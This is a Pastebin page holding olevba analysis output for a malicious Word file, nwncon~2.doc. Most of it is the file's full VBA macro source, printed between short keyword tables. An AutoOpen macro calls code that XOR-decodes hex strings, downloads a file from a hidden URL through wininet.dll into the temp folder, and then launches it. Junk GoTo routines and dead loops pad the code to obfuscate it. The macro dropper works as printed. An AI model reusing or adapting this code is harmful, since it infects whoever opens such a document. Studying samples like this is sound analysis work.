Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- nwncon~2.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: nwncon~2.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- kdloosuu66
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub RIV3333gO()
- GoTo wefwefwefweaafewf
- wefwefwefweaafewf:
- GoTo RERee33EGsssssgvfrgrg
- RERee33EGsssssgvfrgrg:
- GoTo EN299NEIKISKKKK7
- EN299NEIKISKKKK7:
- GoTo EN785NEIKISKKKK71
- EN785NEIKISKKKK71:
- GoTo ENNE435534IKISKKKK72
- ENNE435534IKISKKKK72:
- GoTo ULLL333LLAKhhwshefg
- ULLL333LLAKhhwshefg:
- End Sub
- Public Function memak8of(acascasc22 As String, ghdhdhe8 As String) As String
- Dim asasas1 As Long
- Dim asasas1O As String
- Dim asasas10 As Integer
- Dim efefe332d As Integer
- For efefe332d = 0 To 0
- If efefe332d = 25 Then End
- Next efefe332d
- Dim asasas101 As Integer
- For asasas1 = 1 To (Len(ghdhdhe8) / 2)
- asasas10 = Val("&H" & (Mid$(ghdhdhe8, (2 * asasas1) - 1, 2)))
- asasas101 = Asc(Mid$(acascasc22, ((asasas1 Mod Len(acascasc22)) + 1), 1))
- Dim dwww343a As Integer
- For dwww343a = 0 To 0
- If dwww343a = 4 Then End
- Next dwww343a
- asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
- Dim efe33q299 As Integer
- For efe33q299 = 0 To 0
- If efe33q299 = 4 Then End
- Next efe33q299
- Next asasas1
- memak8of = asasas1O
- End Function
- Private Sub IHYbeffeVuJC()
- GoTo asefawf3
- asefawf3:
- GoTo sgr467gfh
- sgr467gfh:
- GoTo d45854shfhfshf
- d45854shfhfshf:
- GoTo rhhrshrsth455
- rhhrshrsth455:
- GoTo uykoEuxdddd
- uykoEuxdddd:
- GoTo rVTBqKcccccArFPEEEEEyylmMVi
- rVTBqKcccccArFPEEEEEyylmMVi:
- GoTo IhzKeee2ascfacas2zw
- IhzKeee2ascfacas2zw:
- GoTo IhzKeee2svs2333zw
- IhzKeee2svs2333zw:
- GoTo IhzKeee223334css44zw
- IhzKeee223334css44zw:
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module11.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module11'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub RIVgO()
- GoTo myMuLxBcPMGZVtOntBESoqzJEi
- myMuLxBcPMGZVtOntBESoqzJEi:
- GoTo kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd
- kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd:
- GoTo NRsSeqnJfEwsDUkFsCaUyAhAG
- NRsSeqnJfEwsDUkFsCaUyAhAG:
- GoTo jstrwTahLZYosuLbSDlnHk
- jstrwTahLZYosuLbSDlnHk:
- GoTo zivUUwERtNsQiIuoGpMwG
- zivUUwERtNsQiIuoGpMwG:
- GoTo UlAHJSqlOQxDQfT
- UlAHJSqlOQxDQfT:
- End Sub
- Private Sub vuykqyOpo()
- GoTo NrVTBqKAr
- NrVTBqKAr:
- GoTo yylmMViKeIhzKzwqIFMQdZlBwyHfL
- yylmMViKeIhzKzwqIFMQdZlBwyHfL:
- GoTo msLTIokkjoZRZD
- msLTIokkjoZRZD:
- GoTo gjmeCgKuqfzqguEnn
- gjmeCgKuqfzqguEnn:
- GoTo oKQlSkVaAolfxuRnL
- oKQlSkVaAolfxuRnL:
- End Sub
- Public Function adrMOYidGVoIc()
- GoTo AzEpipThgwzCu
- AzEpipThgwzCu:
- GoTo bKtvPsx
- bKtvPsx:
- GoTo qDrdEbaBjAmqQqBvNLi
- qDrdEbaBjAmqQqBvNLi:
- GoTo UQctH
- UQctH:
- GoTo bytQYEZemcHQRPUsyF
- bytQYEZemcHQRPUsyF:
- GoTo wMPSKkyrcJLg
- wMPSKkyrcJLg:
- GoTo bYGTttUdqRmQpGhHS
- bYGTttUdqRmQpGhHS:
- End Function
- Public Function Nk3Tflh()
- GoTo irOJnpV
- irOJnpV:
- GoTo DsYTTRQIOVn
- DsYTTRQIOVn:
- GoTo dSVNmPusaOjZPeoQQ
- dSVNmPusaOjZPeoQQ:
- GoTo luGiChFYjYUOheBl
- luGiChFYjYUOheBl:
- GoTo xJabwyHfLpFms
- xJabwyHfLpFms:
- GoTo IokkjoZRZDePgjmeCgK
- IokkjoZRZDePgjmeCgK:
- GoTo fzqguEnnaM
- fzqguEnnaM:
- End Function
- Private Function QlSkVaAo85668lfxu()
- End Function
- Public Function Nad121112rMOYidGVoI6c()
- GoTo AzEpipThgwzCuibKtvPsxKUqDrdEbaBj
- AzEpipThgwzCuibKtvPsxKUqDrdEbaBj:
- GoTo qQqBvNLi
- qQqBvNLi:
- GoTo UQctHQbytQY
- UQctHQbytQY:
- GoTo GTttUdqRmQpGhHSMfNkT
- GTttUdqRmQpGhHSMfNkT:
- GoTo hsJZgirO
- hsJZgirO:
- End Function
- Public Function psvssqqqqqqY()
- GoTo PoePoePPP
- PoePoePPP:
- GoTo IokkjoKKLHHnaM
- IokkjoKKLHHnaM:
- GoTo QlSkVSsSMmnMxuRnLR
- QlSkVSsSMmnMxuRnLR:
- GoTo ssssscaaaa
- ssssscaaaa:
- GoTo GAAAAFFFFFc
- GAAAAFFFFFc:
- GoTo rA09181hgwzCuS
- rA09181hgwzCuS:
- GoTo KtvPs
- KtvPs:
- End Function
- Private Function UqD34343434rdEbaBjAm()
- End Function
- Private Function vNLigbrgrgRH8856H()
- End Function
- Public Sub tQY34cHQ()
- End Sub
- Public Function y5000S()
- GoTo cJLg6666sssssNbYGT
- cJLg6666sssssNbYGT:
- GoTo UdS334y5y5pGhHS
- UdS334y5y5pGhHS:
- GoTo NkTflaaAAa5555JZgirOJnpV
- NkTflaaAAa5555JZgirOJnpV:
- End Function
- Public Function DsYTTRQIO()
- End Function
- Public Function vssvsef3wtg3gxfvx()
- GoTo sdssssaas
- sdssssaas:
- GoTo sdvsS54738EG
- sdvsS54738EG:
- GoTo oZRZD44444eP
- oZRZD44444eP:
- GoTo meCvvvvvvgKuqf
- meCvvvvvvgKuqf:
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- #If VBA7 And Win64 Then
- Private Declare PtrSafe Function haggd867 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Private Declare PtrSafe Function majig892 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Private Declare PtrSafe Function ssdpOWW192 Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As LongPtr, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Private Declare PtrSafe Function pqaLqqY64 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Private Declare Function haggd867 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Private Declare Function majig892 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Private Declare Function ssdpOWW192 Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As Long, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Private Declare Function pqaLqqY64 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- Private Const MBL = 8162
- Private Const AAN As String = "Mod1"
- Private Const IOTD = 1
- Private Const IFNCW = &H4000000
- Public Function HolDMdWA88(ByVal sURL As String, ByVal sFileName As String) As Boolean
- #If VBA7 And Win64 Then
- Dim hOpen As LongPtr, hFile As LongPtr
- #Else
- Dim hOpen As Long, hFile As Long
- #End If
- Dim Ret As Long
- Dim sBuff As String * MBL, sData As String
- Dim iFile As Integer, dData As Double
- hOpen = majig892(AAN, IOTD, vbNullString, vbNullString, 0)
- If hOpen = 0 Then
- Exit Function
- End If
- hFile = pqaLqqY64(hOpen, sURL, vbNullString, 0, IFNCW, 0)
- If hFile = 0 Then
- dData = 0
- Else
- ssdpOWW192 hFile, sBuff, MBL, Ret
- sData = sBuff
- Do While Ret <> 0
- ssdpOWW192 hFile, sBuff, MBL, Ret
- sData = sData + Mid(sBuff, 1, Ret)
- Loop
- dData = Len(sData): iFile = FreeFile
- Open sFileName For Binary Access Write Lock Write As #iFile
- Put #iFile, , sData: Close #iFile
- End If
- haggd867 hFile
- haggd867 hOpen
- sData = ""
- If dData Then
- HolDMdWA88 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Const GRxvSG = "39060F080F440B3A1B010A020A190D0500"
- Private Const jryj = "363E030F020E26255D594D041308"
- Private Const sdioph34 = "021A1E145945652E0E021008020F110E0B440006452E2F041E0A080918000F400E014C00396509040D4F0E1501"
- Private Const Mcdsef42 = "390D180D131E23240C432508070837131D1E010E2528200E0E17"
- Private Const vjf788eS = "djnjdcjJJkmcakm"
- Sub kdloosuu66()
- Dim FSOOO2
- Dim sder53dfbhRF As Integer
- For sder53dfbhRF = 0 To 0
- If sder53dfbhRF = 5 Then End
- Next sder53dfbhRF
- Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
- Dim fffffF
- Const fffffFID = 2
- Dim DdDd22A As Integer
- For DdDd22A = 0 To 0
- If DdDd22A = 5 Then End
- Next DdDd22A
- Set fffffF = FSOOO2.GetSpecialFolder(fffffFID)
- Dim Ee11 As Integer
- For Ee11 = 0 To 0
- If Ee11 = 5 Then End
- Next Ee11
- EdEdE111 = fffffF & memak8of(vjf788eS, jryj)
- Dim sil3489df As Integer
- For sil3489df = 0 To 0
- If sil3489df = 5 Then End
- Next sil3489df
- Set FSObject2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
- Dim seswwwsa As Integer
- For seswwwsa = 0 To 0
- If seswwwsa = 5 Then End
- Next seswwwsa
- If FSObject2.FileExists(EdEdE111) Then
- FSObject2.DeleteFile EdEdE111
- End If
- If HolDMdWA88(memak8of(vjf788eS, sdioph34), EdEdE111) Then
- End If
- Set SSSS = Nothing
- If FSObject2.FileExists(EdEdE111) Then
- End If
- Set SASASA = CreateObject(memak8of(vjf788eS, GRxvSG))
- SASASA.Open EdEdE111
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module5.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub PkD4040Sccbg()
- End Sub
- Private Sub IHYbe505VuJC()
- GoTo TZmwR230fSEgCdKcNRsSeYqnJf
- TZmwR230fSEgCdKcNRsSeYqnJf:
- GoTo sDUk444FsCaUyA
- sDUk444FsCaUyA:
- GoTo GODjstrwT6904lnHkpCzivUUw
- GODjstrwT6904lnHkpCzivUUw:
- GoTo tNsQiIjuoGp873Tz
- tNsQiIjuoGp873Tz:
- GoTo uykqyO888855poEux
- uykqyO888855poEux:
- GoTo rVTBqKAr357FPyylmMVi
- rVTBqKAr357FPyylmMVi:
- GoTo IhzK4444zw
- IhzK4444zw:
- GoTo FdMQdZlB0258CYajGoQNTnvkPL
- FdMQdZlB0258CYajGoQNTnvkPL:
- GoTo PAtAfFrPpPpHKNFeHmVR
- PAtAfFrPpPpHKNFeHmVR:
- End Sub
- Private Sub RIV1541414gO()
- GoTo myMuLsaaaESoqzJEi
- myMuLsaaaESoqzJEi:
- GoTo kDxnScceeeeeCmUQrTZmwRfSEgCBd
- kDxnScceeeeeCmUQrTZmwRfSEgCBd:
- GoTo NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG
- NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG:
- GoTo jstrwT2352525ahLZYosuLbSDlnHk
- jstrwT2352525ahLZYosuLbSDlnHk:
- GoTo zivUUw44oGpMwG
- zivUUw44oGpMwG:
- GoTo UlAHJS444444qlOQxDQfT
- UlAHJS444444qlOQxDQfT:
- End Sub
- Private Sub vuyk111111qyOpo()
- GoTo NrV1010TBqKAr
- NrV1010TBqKAr:
- GoTo yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL
- yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL:
- GoTo msLTIok444kjoZRZD
- msLTIok444kjoZRZD:
- GoTo gjmeCgKu555qfzqguEnn
- gjmeCgKu555qfzqguEnn:
- GoTo oKQlSkVaA768olfxuRnL
- oKQlSkVaA768olfxuRnL:
- End Sub
- Public Function adrMOY7777idGVoIc()
- GoTo AzEpipThgwsdve4zCu
- AzEpipThgwsdve4zCu:
- GoTo bKtv4444Psx
- bKtv4444Psx:
- GoTo qDrdEbaBj534745674AmqQqBvNLi
- qDrdEbaBj534745674AmqQqBvNLi:
- GoTo UQct874H
- UQct874H:
- GoTo bytQYE0990099ZemcHQRPUsyF
- bytQYE0990099ZemcHQRPUsyF:
- GoTo wMPSKk333yrcJLg
- wMPSKk333yrcJLg:
- GoTo bYG23232TttUdqRmQpGhHS
- bYG23232TttUdqRmQpGhHS:
- End Function
- Public Function Nk3121212Tflh()
- GoTo irO5789JnpV
- irO5789JnpV:
- GoTo DsYTTR3333QIOVn
- DsYTTR3333QIOVn:
- GoTo dSVNmPusa565656OjZPeoQQ
- dSVNmPusa565656OjZPeoQQ:
- GoTo luGiChFYjYUO99999heBl
- luGiChFYjYUO99999heBl:
- GoTo xJabwyHfLpF66666ms
- xJabwyHfLpF66666ms:
- GoTo Io44kkjoZRZDePgj54meCgK
- Io44kkjoZRZDePgj54meCgK:
- GoTo fz343333222MMMaM
- fz343333222MMMaM:
- End Function
- Private Function QlSkGhHHGgglfxu()
- End Function
- Public Function psvssEEEqqqqqqY()
- GoTo PoeP001199PPP
- PoeP001199PPP:
- GoTo OPDK333339ja
- OPDK333339ja:
- GoTo JabwyU444444IOTYhFms
- JabwyU444444IOTYhFms:
- GoTo IokkjoKKLHH55555naM
- IokkjoKKLHH55555naM:
- GoTo QlSkVSsSM66666mnMxuRnLR
- QlSkVSsSM66666mnMxuRnLR:
- GoTo s77777sssscaaaa
- s77777sssscaaaa:
- GoTo GAAAAFFFFFc
- GAAAAFFFFFc:
- GoTo rA09181hg88888wzCuS
- rA09181hg88888wzCuS:
- GoTo KtvP999999s
- KtvP999999s:
- End Function
- Private Function UqD34343000000dEbaBjAm()
- End Function
- Private Function vNLigbrg1010108856H()
- End Function
- Public Sub tQY34212121cHQ()
- End Sub
- Public Function y5012121200S()
- GoTo cJLg666wewEEENbYGT
- cJLg666wewEEENbYGT:
- GoTo UdSWRRrrRRTT5y5pGhHS
- UdSWRRrrRRTT5y5pGhHS:
- GoTo NkTflaaAAaYyYyYyJnpV
- NkTflaaAAaYyYyYyJnpV:
- End Function
- Public Function DsYT3332222TRQIO()
- End Function
- Public Function vssvs234567gxfvx()
- GoTo sdsssNnNnsaas
- sdsssNnNnsaas:
- GoTo sdvsS5KkKk4738EG
- sdvsS5KkKk4738EG:
- GoTo oZRZD44UuUuUu444eP
- oZRZD44UuUuUu444eP:
- GoTo meCvvvvvvgKuqf
- meCvvvvvvgKuqf:
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement